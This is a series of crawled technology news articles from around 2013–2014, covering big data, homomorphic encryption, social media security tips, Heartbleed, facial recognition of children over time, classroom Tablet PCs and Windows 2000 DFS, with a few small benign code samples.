GeoDeepDive is one of dozens of projects that received funding from a $200 million White House initiative launched in March 2012 to help government agencies, businesses and researchers make better use of what’s called “big data.”
Here’s what that means: Data exist all over the world, in proliferating amounts. Satellites beam back images comprising every square mile of Earth multiple times each day; publishers crank out book after book; and 4.5 million new URLs appear on the Web each month. Electronic sensors record vehicle speeds on the Interstate Highway System, weather conditions in New York’s Central Park and water activity at the bottom of the Indian Ocean. Until recently, scientists, sociologists, journalists and marketers had no way to make sense of all this data. They were like U.S. intelligence agencies before the Sept. 11 terrorist attacks. All the information was there, but no one was able to put it together.
Three things have brought order to that cacophony in recent years. The first is the growth of massive computer clouds that virtually bring together tens or hundreds of thousands of servers and trillions of bytes of processing capacity. The second is a new brand of software that can link hundreds of those computers together so they effectively act like one massive computer with a nearly unlimited hunger for raw data to crunch.
The third element is a vastly improved capacity to sort through unstructured data. That includes information from videos, books, environmental sensors and basically anything else that can’t be neatly organized into a spreadsheet. Then computers can act more like humans, pulling meaning from complex information such as Peters’ geosciences journals without, on the surface at least, reducing it to a series of simple binary questions.
“For a number of years we’ve worked really hard at transforming the information we were collecting into something that computers could understand,” says Sky Bristol, chief of Science Information Services at the U.S. Geological Survey. “We created all these convoluted data structures that sort of made sense to humans but made more sense to computers. What’s happened over the last number of years is that we not only have more powerful computers and better software and algorithms but we’re also able to create data structures that are much more human understandable, that are much more natural to our way of looking at the world.
“The next revolution that’s starting to come,” he says, “is instead of spending a lot of energy turning data into something computers can understand, we can train computers to understand the data and information we humans understand.”
Big data has hit the digital world in a big way. The claims for its power can seem hyperbolic. A recent advertisement for a launch event for the book Big Data: A Revolution That Will Transform How We Live, Work, and Think (Eamon Dolan/Houghton Mifflin Harcourt, 2013) promised the authors would explain why the “revolution” wrought by big data is “on par with the Internet (or perhaps even the printing press).”
Big data’s promise to transform society is real, though. To see its effect one need not look to Guttenberg but to Zuckerberg, Page and Brin. Each day Facebook and Google chew through millions of pages of unstructured text embedded in searches, emails and Facebook feeds to deliver targeted ads that have changed how sellers reach consumers online.
Retailers are mining satellite data to determine what sort of customers are parking in their competitors’ parking lots, when they’re arriving and how long they’re staying. An official with Cisco’s consulting arm recently suggested big box retailers could crunch through security camera recordings of customers’ walking pace, facial expressions and eye movements to determine the optimal placement of impulse purchases or what store temperature is most conducive to selling men’s shoes.
Big data is making an appearance in international aid projects, in historical research and even in literary analysis.
Re, the University of Wisconsin computer scientist, recently teamed with English professor Robin Valenza to build a system similar to GeoDeepDive that crawls through 140,000 books published in the United Kingdom during the 18th century. Valenza is using the tool to investigate how concepts such as romantic love entered the English canon. Ben Schmidt, a Princeton University graduate student in history, has used a similar database built on the Google Books collection to spot linguistic anachronisms in the period TV shows Downton Abbey and Mad Men. His assessment: The Sterling Cooper advertising execs of Mad Men may look dapper in their period suits but they talk about “keeping a low profile” and “focus grouping”—concepts that didn’t enter the language until much later.
The ‘Holy Grail’
The White House’s big data investment was spawned by a 2011 report from the President’s Council of Advisors on Science and Technology, a group of academics and representatives of corporations including Google and Microsoft. The report found private sector and academic researchers were increasingly relying on big data but weren’t doing the sort of basic research and development that could help the field realize its full potential.
The council wasn’t alone. The research arm of McKinsey Global Institute predicted in May 2011 that by 2018 the United States will face a 50 percent to 60 percent gap between demand for big data analysis and the supply of people capable of performing it. The research firm Gartner predicted in December 2011 that 85 percent of Fortune 500 firms will be unprepared to leverage big data for a competitive advantage by 2015.
The White House investment was funneled through the National Science Foundation, the National Institutes of Health, and the Defense and Energy departments, among other agencies. The grants are aimed partly at developing tools for unstructured data analysis in the private, academic and nonprofit worlds but also at improving the way data is gathered, stored and shared in government, says Suzi Iacono, deputy assistant director of the NSF’s Directorate for Computer and Information Science and Engineering.
As an example, Iacono cites the field of emergency management. New data storage and analysis tools are improving the abilities of the National Weather Service, FEMA and other agencies to predict when and how major storms such as Hurricane Sandy are likely to hit the United States. New Web and mobile data tools are making it easier for agencies to share that information during a crisis.
“If we could bring together heterogeneous data about weather models from the past, current weather predictions, data about where people are on the ground, where responders are located— if we could bring all this disparate data together and analyze them to make predictions about evacuation routes, we could actually get people out of harm’s way,” she says. “We could save lives. That’s the Holy Grail.”
One of the largest impacts big data is likely to have on government programs in the near term is by cutting down on waste and fraud, according to a report from the industry group TechAmerica released in May 2012.
The Centers for Medicare and Medicaid Services launched a system in 2011 that crunches through the more than 4 million claims it pays daily to determine the patterns most typical of fraud and possibly deny claims matching those patterns before they're paid out. The government must pay all Medicare claims within 30 days. Because it lacks the resources to investigate all claims within that window, CMS typically has paid claims and then investigated later, an inefficient practice known as "pay and chase."
The board that tracks spending on President Obama’s 2009 stimulus package used a similar system to weed out nefarious contractors.
Big data is having an impact across government, though, in areas far afield from fraud detection. The data analysis company Modus Operandi received a $1 million Army contract in late 2012 to build a system called Clear Heart, which would dig through hundreds of hours of video—including footage from heavily populated areas—and pick out body movements that suggest what officials call “adversarial intent.” That could mean the posture or hand gestures associated with drawing a gun or planting a roadside bomb or the gait of someone wearing a suicide bombing vest.
The contract covers only the development of the system, not its implementation. But Clear Heart holds clear promise for drone surveillance, Modus Operandi President Richard McNeight says. It could be used to alert analysts to possible dangers or to automatically shed video that doesn’t show adversarial intent, so analysts can better focus their efforts.
The technology also could have domestic applications, McNeight says.
He cites the situation in Newtown, Conn., where a gunman killed 20 elementary school students and six adults. “If you’d had a video camera connected with this system it could have given an early warning that someone was roaming the halls with a gun,” McNeight says.
Big data’s greatest long-term effects are likely to be in the hard sciences, where it has the capacity to change hypothesis-driven research fields into data driven ones. During a panel discussion following the announcement of the White House big data initiative, Johns Hopkins University physics professor Alex Szalay described new computer tools that he and his colleagues are using to run models for testing the big-bang theory.
“There’s just a deluge of data,” the NSF’s Iacono says. “And rather than starting by developing your own hypothesis, now you can do the data analysis first and develop your hypotheses when you’re deeper in.”
Coupled with this shift in how some scientific research is being done is an equally consequential change in who’s doing that research, Iacono says.
“In the old days if you wanted to know what was going on in the Indian Ocean,” she says, “you had to get a boat and get a crew, figure out the right time to go and then you’d come back and analyze your data. For a lot of reasons it was easier for men to do that. But big data democratizes things. Now we’ve got sensors on the whole floor of the Indian Ocean, and you can look at that data every morning, afternoon and night.”
Big data also has democratized the economics of conducting research.
One of NIH’s flagship big data initiatives involves putting information from more than 1,000 individual human genomes inside Amazon’s Elastic Compute Cloud, which stores masses of nonsensitive government information. Amazon is storing the genomes dataset for free. The information consumes about 2,000 terabytes—that’s roughly the capacity required to continuously play MP3 audio files for 380 years—far more storage than most universities or research facilities can afford. The company then charges researchers to analyze the dataset inside its cloud, based on the amount of computing required.
This storage model has opened up research to huge numbers of health and drug researchers, academics and even graduate students who could never have afforded to enter the field before, says Matt Wood, principal data scientist at Amazon Web Services. It has the potential to drastically speed up the development of treatments for diseases such as breast cancer and diabetes.
Over time, Wood says, the project also will broaden the scope of questions those researchers can afford to ask.
“If you rewind seven years, the questions that scientists could ask were constrained by the resources available to them, because they didn’t have half a million dollars to spend on a supercomputer,” he says. “Now we don’t have to worry about arbitrary constraints, so research is significantly accelerated. They don’t have to live with the repercussions of making incorrect assumptions or of running an experiment that didn’t play out.” | <urn:uuid:6ee29b52-fe18-4d6a-8fc8-d4113e2b9664> | CC-MAIN-2017-09 | http://www.nextgov.com/big-data/2013/04/welcome-data-driven-world/62319/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00345-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.952376 | 2,899 | 2.953125 | 3 |
University researchers have taken an important step forward on cloud security by proving it's possible for a server to process encrypted data and to send back a still-encrypted result.
The technique, developed at the Massachusetts Institute of Technology (MIT), is based on homomorphic encryption, which makes it possible for a cloud server to process data without decryption.
The new method involves stitching homomorphic encryption with two other techniques into what the researchers call a "functional-encryption scheme." The technique is not ready for prime time. The researchers acknowledge that it requires too much computational power to be practical.
Nevertheless, that problem can be attacked over time, now that researchers know it is possible to process data without decryption. "Before, we didn't even know if this was possible," said Raluca Ada Popa, a coauthor of the research and a graduate student in the Department of Electrical Engineering and Computer Science at MIT.
With today's technology, if an encrypted search term is not decrypted first, then the receiving server has no choice but to send back information on every database record it has. As a result, the recipient's computer would then have to do the decryption and handle the computations necessary to determine the applicable results.
Homomorphic encryption, a promising research topic in cryptography, makes it possible to process data while maintaining end-to-end encryption. The researchers' new functional-encryption scheme takes that technology a step further by enabling the cloud server to run a single, specified computation on the homomorphically encrypted result -- such as, "Is this record a match?" -- without having to extract any other information.
To do that, the researchers used two other schemes, called garbled circuit and attribute-based encryption. Each has select capabilities necessary for functional encryption.
The new system begins with homomorphic encryption and embeds the decryption algorithm in a garbled circuit. The key to the garbled circuit is protected in turn by attribute-based encryption, which keeps the whole process encrypted.
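For readers who want a concrete feel for the homomorphic building block, below is a minimal sketch of the Paillier cryptosystem, which is additively homomorphic: multiplying two ciphertexts yields an encryption of the sum of the plaintexts. The parameters are toy-sized and insecure, and the sketch does not attempt the garbled-circuit or attribute-based layers of the MIT scheme; it only shows a server combining data it cannot read.

```python
# Toy Paillier encryption: additively homomorphic, i.e. Enc(a) * Enc(b) decrypts
# to a + b. The primes below are far too small for real security; this only
# illustrates how a server can compute on data it cannot read.
import math, random

p, q = 17, 19                     # toy primes (a real key uses ~1024-bit primes)
n = p * q
n2 = n * n
g = n + 1
lam = math.lcm(p - 1, q - 1)      # Carmichael function for n = p*q
mu = pow((pow(g, lam, n2) - 1) // n, -1, n)   # inverse of L(g^lam mod n^2) mod n

def encrypt(m):
    r = random.randrange(1, n)
    while math.gcd(r, n) != 1:
        r = random.randrange(1, n)
    return (pow(g, m, n2) * pow(r, n, n2)) % n2

def decrypt(c):
    return ((pow(c, lam, n2) - 1) // n * mu) % n

a, b = 12, 30
ca, cb = encrypt(a), encrypt(b)
combined = (ca * cb) % n2          # the "server" multiplies ciphertexts only
print(decrypt(combined))           # -> 42, without the server ever seeing 12 or 30
```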
Steve Pate, co-founder and chief technology officer for cloud encryption company HighCloud Security, said the new research was "encouraging." But he noted a big stumbling block: "The computation required for homomorphic encryption far exceeds what we have today in terms of computing resources."
Before such a technique can work, there will need to be advances in hardware where the encryption and key management capabilities occur within the processor or other hardware module, he said.
Andrew Hay, director of applied security research at CloudPassage, said homomorphic encryption is likely to drive security in the future in multi-tenant public cloud environments where servers, applications and processes cannot know each other's encrypted data. Examples of such environments include Amazon EC2, Google Compute Engine and Rackspace.
Nevertheless, the efficacy of the latest research will not be known until it is tested in production environments. "The theoretical promises of the technology need to be vetted by industry security practitioners, not just by academics," Hay said.
The MIT research was presented last week at the Association for Computing Machinery's 45th Symposium on the Theory of Computing. Joining the MIT researchers in the work were scientists from the University of Toronto and Microsoft.
This story, "MIT Researchers Advance Cloud Security with End-to-End Encryption," was originally published by CSO.
Phishing attacks -- like the one that may have been behind the recent Twitter AP hoax -- will persist because they work. Social engineering scams will grow more creative in their efforts to con people into coughing up bank account info, network credentials and other sensitive data. And social sites -- all of which are predicated upon words like sharing and connecting -- will be a prime breeding ground for such activity, even with tighter perimeter defenses such as two-factor authentication. We're still human, after all, and therefore susceptible to making mistakes.
"Social networking sites can roll out great levels of security," said AVG senior security evangelist Tony Anscombe in an interview. "The problem is at the other end of it, you've got users."
Should you delete your social accounts, unplug your router, throw your phone in the ocean and move off the grid? Keeping your information secure doesn't necessarily require drastic action -- but it does require action. Consider these steps to better protect your social media accounts.
1. You Guessed It: Use Strong Passwords.
It's been said countless times, yet people continue to use things like birthdates or "1234" as passwords. Even worse, they often use the same password across every account they own. That's not good enough. "That is primarily the number-one thing you must do," Anscombe said. Passwords don't have to be random or impossible to remember, but they do need to be tough to crack. "Make it difficult for somebody to socially engineer what [the password] is," Anscombe said.
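For readers who want a password that is genuinely hard to guess, here is a short sketch using Python's standard secrets module; the length and character set shown are just example choices. A password manager can generate and remember strings like this so you never have to type them from memory.

```python
# Generate a random, hard-to-guess password from a mix of character classes.
import secrets
import string

def make_password(length=16):
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*-_"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(make_password())   # e.g. 'q7!Rf_2mZp9xW4aK' -- different every run
```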
2. Review Your Apps, Add-Ons and Other Settings.
Anscombe noted that he checked his Twitter account prior to our conversation and was reminded of just how many other applications can gain access to your Twitter account. Yet many people forget to whom else they've granted access, not just on Twitter but on any social site. Take time to review your apps and other add-ons and revoke access from any you don't use or don't remember installing.
"We all download things to try to make it simpler for us, and then we don't use it or use something else," Anscombe said. "What we don't do is ever go back and decline those privileges afterwards."
Among other potential problems: Even when Twitter and other companies roll out two-factor authentication, it doesn't mean the other sites and apps that have access to your data will, too. To review your installed apps in Twitter, just visit Settings and then Apps. The site makes it simple to revoke access from there.
3. Be More Cautious with Mobile.
"Make sure your mobile phone is secure," Anscombe advised, adding that while most PC users these days have some form of anti-malware protection in place, many folks don't take the same precaution on their mobile devices. At minimum, use a free security app. (AVG and many of its competitors offer one for Android and other platforms.)
Don't let a security app fool you into thinking you've eliminated all risks, though. Anscombe noted, for example, that mobile browsers may make users more susceptible to phishing sites and similar scams. One reason is that mobile screen sizes sometimes make it hard -- or impossible -- to detect irregularities in a browser's URL bar. "The Web browser does that so you get maximum screen vision of the content rather than the address bar, but you don't have the same visual protections," Anscombe said. "They're trying to make it easier for us, but in [doing so] it also loses some of its security as well."
4. Sites Update Privacy Settings -- So Should You.
Regularly review your privacy and other account settings on social sites to ensure they meet your current expectations and needs. Sites regularly revise those settings; users need to as well. Otherwise, you might find your information being used in ways that you're uncomfortable with, Anscombe said.
5. Beware "Password Check" Sites.
Scams often ride on the coattails of other scams. A common one after high-profile breaches: Password-check sites. Paul Ducklin of Sophos noted in a recent blog post that while these sites are sometimes legitimate, they're often cons built to capture your credentials in the wake of other hacks. "That sounds like phishing, doesn't it?" Ducklin wrote. "And the reason it sounds like phishing is that it IS phishing!" Treat such sites with extreme skepticism.
If you're responsible for your employer's corporate Twitter handles and other social media, you should consider tighter controls over those accounts. Anscombe noted that even companies with very restrictive policies governing data security, external communications, content management and similar areas often don't treat their social accounts with the same degree of gravity, exposing themselves to unnecessary risks as a result.
Nate Ulery, who leads the IT infrastructure and operations practice at West Monroe Partners, concurred. Two-factor authentication on Twitter and other sites definitely helps, but don't expect hackers and criminals to simply log off and call it quits.
"While two-factor authentication will help minimize social media hacking risks, companies will need to continue to be vigilant in enforcing their security policies," Ulery said via email interview. "For example, Facebook's standard two-factor authentication is only required when a login occurs on a new computer or mobile phone. Since recognized devices can still access the account without the additional security requirement, malicious software installed on a PC or mobile phone could still potentially expose the social media account." | <urn:uuid:b74b7b91-7757-4eb8-8257-5e9524ccdad8> | CC-MAIN-2017-09 | http://www.networkcomputing.com/government/twitter-trouble-9-social-media-security-tips/1591868953?cid=rssfeed_iwk_authors | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00397-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953177 | 1,161 | 2.6875 | 3 |
What is phishing? In the cyber world, phishing is a serious crime, a form of online fraud. The crime takes the form of online attacks that use forged e-mails and counterfeit websites to obtain confidential and sensitive information from people engaged in online correspondence and transactions. The fake websites are copycats of a reputable organization's original site, imitating its design and other features; a bank's website, for example, is a common target for phishers to copy.
No matter how hard you try to stay safe, some aspects of securing your online data are completely out of your hands. That fact was made painfully obvious on Monday, when the Internet got caught with its collective pants down thanks to a critical vulnerability affecting a fundamental tool for secure online communications.
Called Heartbleed, the bug has been in the wild for more than two years now. It allows attackers to exploit a critical programming flaw in OpenSSL--an open source implementation of the SSL/TLS encryption protocol.
When exploited, the flaw leaks data from a server's memory, which could include SSL site keys, usernames and passwords, and even personal user data such as email, instant messages, and files, according to Finland-based Codenomicon, the security firm that first uncovered Heartbleed in concert with a Google researcher.
That's bad. Real bad, though it's important to note that Heartbleed only affects OpenSSL and not the security protocol itself.
But due to OpenSSL's popularity with website administrators, the potential number of affected websites is huge. Security and Internet research firm Netcraft estimates that Heartbleed affects around half a million "widely trusted websites."
Yahoo has already said it was hit by the Heartbleed bug and Yahoo-owned Tumblr is advising users to update their passwords ASAP.
"On the scale of 1 to 10, this [Heartbleed] is an 11," respected security expert Bruce Schneier said on his blog.
Yes, this bug is pretty serious and almost certainly affects at least one of your online accounts. But now that we've got the scary stuff out of the way, let's talk about some of the practical measures you need to know about.
Keep calm and...
Thanks to Heartbleed, it's possible that some unscrupulous actors online could have your username and password. And you should definitely change your password on any site that says it was affected.
But here's the thing: While OpenSSL already has a fix available, changing your username and password before a site patches its servers achieves nothing. In fact, it could make things worse.
"You should change password after the service provider has patched their site. Otherwise you just contribute to the data that can be stolen," Codenomicon spokesperson Ari Takanen told us via email.
...don't carry on
Heartbleed was publicized on Monday. So by now, many sites should have scrambled (or are scrambling) to patch their servers. You can find out if a site is still affected by Heartbleed using online checkers provided by LastPass, Qualsys, or Filippo Valsorda.
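Administrators can also check which OpenSSL build their own software is linked against; versions 1.0.1 through 1.0.1f are vulnerable, and 1.0.1g carries the fix. The rough sketch below reports only the library the local Python interpreter was built against, not what a remote site is running, so treat it as a quick local sanity check rather than a site scanner.

```python
# Report the locally linked OpenSSL version and warn if it falls in the
# Heartbleed-affected range (1.0.1 through 1.0.1f).
import ssl

version = ssl.OPENSSL_VERSION            # e.g. "OpenSSL 1.0.1e 11 Feb 2013"
print(version)

affected = ["1.0.1" + letter for letter in ["", "a", "b", "c", "d", "e", "f"]]
if any(f"OpenSSL {v} " in version for v in affected):
    print("WARNING: this OpenSSL build is in the Heartbleed-affected range.")
```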
If you find that a site you use often is still affected by the vulnerability, Codenomicon advises taking a "day off" from that site. Heartbleed only exposes data that's held in a server's memory (RAM). This isn't a break-in-and-read-the-database type of flaw. Your data needs to be in a server's memory when it's attacked to be exposed.
That's one reason why changing your password before a site is patched could actually be worse than doing nothing, especially now that Heartbleed is public knowledge.
Security flaws like this are also a good time for some reminders about how best to secure your online accounts.
You should really be using two-factor authentication for all your accounts that offer it. Two-factor authentication requires you to enter an extra code before accessing your online accounts. The code is typically generated by a smartphone app or keychain dongle, but you can also receive codes to your phone via SMS.
This extra step requires attackers to know how to generate your two-factor authentication code before they can login to your account. In the case of Heartbleed, two-factor authentication may not have been as useful a defense, but in general this extra step helps keep your account safer than it was.
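Under the hood, most authenticator apps derive those codes with the time-based one-time password (TOTP) algorithm: an HMAC over a shared secret and a 30-second time counter. A compact sketch follows; the base32 secret is a made-up example, not a real account key.

```python
# Time-based one-time password (TOTP, RFC 6238) as used by most authenticator
# apps: HMAC-SHA1 over a 30-second time counter, truncated to 6 digits.
import base64, hashlib, hmac, struct, time

def totp(secret_b32, step=30, digits=6):
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time() // step))
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    number = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(number % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))   # example secret; prints a fresh code every 30 s
```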
Use a password manager
Now's a good time to start using a password manager, especially if you're going to be changing some user logins over the next few days. A password manager makes it easy to generate randomized passwords using a combination of letters, numbers, and special characters. It also relieves you of having to memorize every one of those overly complex codes.
Password managers often come with other features as well such as secure notes, and autofill for online forms.
There are many options out there for password managers, but some of our favorites include LastPass, Dashlane, and KeePass. LastPass recently said in a blog post that it was using the version of OpenSSL affected by Heartbleed; however, because the service encrypts your data before transmitting it online, the company says its users were not at risk of having their data exposed to the bad guys.
Heartbleed is certainly a nasty little bug that needs to be taken seriously. But considering it's been in the wild for more than two years, there's not much a user can do now except wait patiently for affected sites to patch their servers before changing any passwords.
Once those sites are patched, however, you'll want to change your password as soon as possible.
This story, "The critical, widespread Heartbleed bug and you: How to keep your private info safe" was originally published by PCWorld. | <urn:uuid:33ebf3a6-60ee-4ffb-8fb6-259f2c91f751> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2175981/lan-wan/the-critical--widespread-heartbleed-bug-and-you--how-to-keep-your-private-info-safe.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00037-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.959406 | 1,116 | 2.75 | 3 |
Illinois school district uses Toshiba Tablet PCs to facilitate teacher-student collaboration.
By bringing Tablet PCs and wireless projectors into its classrooms, Hinsdale Township Public High School District 86 is revolutionizing teaching in Illinois.
It was nearly eight years ago that the school's mobile computing vision started taking form, but it wasn't until last year, during a Tablet PC presentation by Microsoft Corp. and Toshiba America Inc., that the school found the perfect fit.
Hinsdale had wanted to replace its stationary desktop PCs with more-mobile hardware, which would allow increased student and teacher interaction and better student collaboration. Various laptop models weren't ideal for the classroom environment because their screens created a barrier between teachers and students, said James Polzin, assistant superintendent for the school district, in Hinsdale. But the Tablet PC, which allows students to input data with the units lying flat on their desks, solved the problem.
"It was the most intriguing thing we'd seen, and it eliminated the screen as an upright barrier. Plus, we could do annotation in color, inking in color, highlighting, diagrams," said Mark Pennington, assistant principal. "It really brought thoughts to paper in a colorful way that can be shared electronically."
Coupled with wireless projectors from InFocus Corp., Toshiba Portégé M200 Tablet PCs would allow teachers to project their notes onto a screen, leaving them free to walk around the classroom and interact with students. Students can also share their work with other students via the projectors, without the fear of having to walk to the blackboard.
Using the tablet's stylus, teachers can annotate changes on students' tablets and project those changes on the screen for the class.
But picking the right hardware was a small step compared with the undertaking Hinsdale had ahead. Introducing a new technology into a school system presents numerous barriers, including cost justification, teacher adoption, instructor training and hardware implementation.
To tackle that effort, as well as the hardware procurement, Hinsdale turned to CDW Government Inc., a Vernon Hills, Ill., reseller for the education and government sectors. Hinsdale had worked with CDW-G in the past, mostly on hardware for its administrative offices.
Hinsdale's idea: a pilot test. So with CDW-G's help, the school last year launched a pilot test in one of its math classes whose PCs were up for replacement. During the pilot test, all the school's teachers were required to visit the class at some point to see the technology in action.
"We made sure that everybody who could be impacted was involved in the process from understanding it to providing feedback and input," said Polzin.
The pilot test was a success, according to Polzin, and it helped those leading the charge to gain approval from teachers, a big part of implementing new technologies in a school system.
The pilot test also helped Hinsdale prove to the board of education that Tablet PCs offered enough educational value over laptops to justify the extra cost.
"Tablets are more expensive than traditional desktops, and we had to work with the board of education for financial support," said Polzin.
Training the Teachers | <urn:uuid:508322e2-619d-43d6-940d-4fe7c063a356> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Desktops-and-Notebooks/Big-WLAN-on-Campus | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00565-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967157 | 674 | 2.578125 | 3 |
This story began with a simple question: if a facial recognition system processes a lot of pictures of a child, will it recognize that person when he or she grows up?
If I were to upload all my childhood photos to Facebook (or some future Facebook), could a biometric identification system link the button-nosed, round-cheeked child with a bowl cut to my adult face, which has lost its button, cheeks, and hair?
It's not an idle question: parents are posting millions of photos of their children to social networking sites, as are kids themselves when they are old enough to use Facebook and the like. Will these photos permanently identify them as they grow older, linking their childhood or teenage antics to their adult identities?
Or does the natural aging process provide some level of protection from the prying computations of facial recognition algorithms? If I can barely identify myself in photos from my childhood, what hope does a computer have?
There is no simple answer, though there is a good theoretical lower age-limit: it would be very difficult for a facial recognition system to match up a photograph of a child under the age of seven with a photograph of that same person as an adult.
And, in practice, most facial recognition systems aren't close to being able to do this kind of identification in the field. Still, that might not allay the worries of technology thinkers like Amy Webb, who recently warned parents to post no photographs of their children online because "ubiquitous bio-identification is only just getting started."
What's at stake is this: how firmly do we want the media that children produce to attach to their adult identities? For most current adults, the pictures and videos we made as kids are not searchable or accessible, except for the hand-curated selections of "throwback Thursday."
Kids growing up on the Internet now are trailed by an ever larger and deeper digital footprint. The danger is that it might restrict their freedom to develop as future people, if algorithms rely on what they know about someone's childhood to channel their possibilities as an adult.
If pictures (or YouTube videos) from your youth can be connected to your adult identity, it would, at the very least, increase the ethical complexity of posting or hosting images of children.
Let's get into the details.
This kind of facial recognition work emerges from very different places: forensic scientists, pure computer scientists, and facial recognition practitioners. Forensic scientists are trying to solve a very practical problem: if a child goes missing for some long period of time, how can law enforcement create a more up-to-date portrait of the child? They want a system that can artificially age a missing child's face. We all know kids change, but that's not the kind of rigorous analysis one needs to Photoshop five years onto a child's visage. Artificial aging is almost the reverse of what a facial recognition system would do.
The fastest changes happen from infancy to age 3, and then during adolescence (after 10 years old) into adulthood, said Alex Cybulski, a doctoral candidate at the University of Toronto Information School, where he's studying surveillance. "You can understand how this complicates things as the changes to the craniofacial shape and texture of a face during the early period of an individual's life are rapid and thus elusive to estimation by computer modeling for the purposes of facial recognition."
Elusive, perhaps, but not impossible. Cybulski pointed to the work of forensic researcher Stuart Gibson at the University of Kent, who "has proposed that because of the way in which the face changes during [childhood] starting at age seven is considered the maximum range through which changes can be estimated and therefore, reliably compared."
What Gibson has done is try to take images of children at various ages and build computer models that attempt to artificially age them. So, for example, here, the photos on the far left (A) and right (F) are actual pictures of the subjects. Columns B through E show different algorithmic projections based on his models.
One can imagine that these attempts to quantitatively model the changes in bone structure, skin texture, and other aesthetic variables might lead to a better facial recognition system.
Another place this quixotic question led me was to mathematicians like Nigel Boston at the University of Wisconsin, Madison. He referred me to the work of UCLA's Stephen Soatto.
For Soatto, a face is shape-space with certain properties. "Your identity is what is left invariant by some class of transformations," is how he put it to me. For him, the problem is that if we want to match photos or discriminate between individuals, there are two kinds of variability. One is intrinsic—my face now versus my face 25 years ago—but the other is "nuisance variability," or features of images that are irrelevant to my identity.
Soatto wrote a paper on getting rid of this kind of variability with respect to focal length in images, which heavily distort people's faces (especially the front-facing one on your phone: "you cannot see your ears, your nose looks bigger"). And he saw a parallel between the mathematics underlying that research and quantifying the effects of aging. In our specific question, the nuisance variability we are trying to eliminate is time, and "the way in which time affects your data is very complex, but mathematically it is a 1-parameter morphism that deforms your face," Soatto said.
He believes that using the same methodology as in the focal length study could be applied to aging and facial recognition. They could feed lots of images into the model and "learn away the variability," he said. "Conceptually, it is exactly the same thing. The only difficulty is getting the data for this. You need consent and it would be a long, longitudinal study."
The challenge, of course, is that we all age differently, but "there is geometric consistency because faces are not arbitrary objects." One can expect crow's feet and a wobblier jaw, for example. Or for children, one can expect the size of the forehead to even out relative to the rest of the face.
Perhaps some set of the dozens of possible landmarks on a face hold constant, or the relationships between them do.
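One crude way to test that intuition is to compare ratios of distances between landmarks, which stay the same when a photo is merely scaled. The sketch below uses invented coordinates and only two ratios; real systems detect dozens of landmarks automatically and fit far richer statistical models.

```python
# Compare two faces by scale-invariant ratios of distances between landmarks.
# Coordinates are invented for illustration; a real pipeline would detect
# dozens of landmarks automatically and learn which relations stay stable.
from math import dist

def ratios(lm):
    eye_span = dist(lm["left_eye"], lm["right_eye"])   # used as the unit of length
    return {
        "nose_to_chin": dist(lm["nose"], lm["chin"]) / eye_span,
        "eye_to_mouth": dist(lm["left_eye"], lm["mouth"]) / eye_span,
    }

child = {"left_eye": (30, 40), "right_eye": (60, 40), "nose": (45, 55),
         "mouth": (45, 70), "chin": (45, 85)}
adult = {"left_eye": (120, 160), "right_eye": (240, 160), "nose": (180, 230),
         "mouth": (180, 290), "chin": (180, 350)}

print(ratios(child))
print(ratios(adult))   # similar ratios hint that relations, not sizes, persist
```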
How good could a computer system get at this kind of computation?
"Suppose we take your two photos separated by x years. To keep things simple, assume they are portraits (frontal pose, neutral expression and uniform illumination). Generally, if x < 10 years, high matching accuracy will be maintained by state of the art face recognition systems. But because different persons age differently, this value of x may vary from person to person," a computer vision practitioner Anil Jain, a professor at Michigan State, told me in an email.
Children, of course, would be more difficult. And, Jain noted, that face matching in "unconstrained settings" like surveillance video or random snapshots "poses challenges."
But most of the work that's been done by academics draws on dozens to thousands of photographs. What happens when one attains Facebook scale, billions of photos, with thousands (or even tens of thousands) of images of an individual through time?
"We will likely see much more work on this once social networks have built up libraries of digital images of people at different ages," said Yana Welinder, an affiliate scholar at Stanford's Center for the Internet and Society, who has studied facial recognition. You can bet that Facebook is going to try to identify its users no matter how old they are, or in whose pictures they appear. And they'll probably get good, too, as the "unreasonable effectiveness of data" makes their algorithms better.
Will computers ever get better than humans?
Soatto, for one, doubts it. Facial recognition, after all, is a remarkably difficult task that (almost) all humans are exceptional at. "The reality is that it is so complex and humans are so attuned to very subtle cues on the human face that it would be very difficult for an engineered system to mimic or exceed the extrapolated abilities of humans," he said.
The problem is that it goes to "the core of what knowledge and learning is," Soatto said. "There is tons of data and the data is not information. Information is what is left in the data after you throw away what doesn't matter to your task. You've picked one source of nuisance variability, which is age, and that's a tough one. But that same conundrum permeates every other branch of knowledge and learning."
The fundamental nature of the problem might suggest that until the machines can learn as well as we do, it will be difficult for them to overtake us in facial recognition tasks. | <urn:uuid:b6f22560-a9d2-4eda-89e7-6cbb7ffce322> | CC-MAIN-2017-09 | http://www.nextgov.com/big-data/2014/05/computers-see-your-face-child-will-they-recognize-you-adult/84319/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00089-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964146 | 1,801 | 2.796875 | 3 |
Using the Windows 2000 Distributed File System
In Windows NT 4.0, Microsoft provided an add-on product called Distributed File System (DFS) that allowed physically separate network file resources to be grouped together and accessed as if they were a single logical structure. The product, which was a free download, failed to make a great impact with network administrators and went largely unnoticed. With Windows 2000, DFS is included with the OS and provides a number of new functions. The tool for managing the DFS structure has been improved, and wizards serve to make setup an easy task.
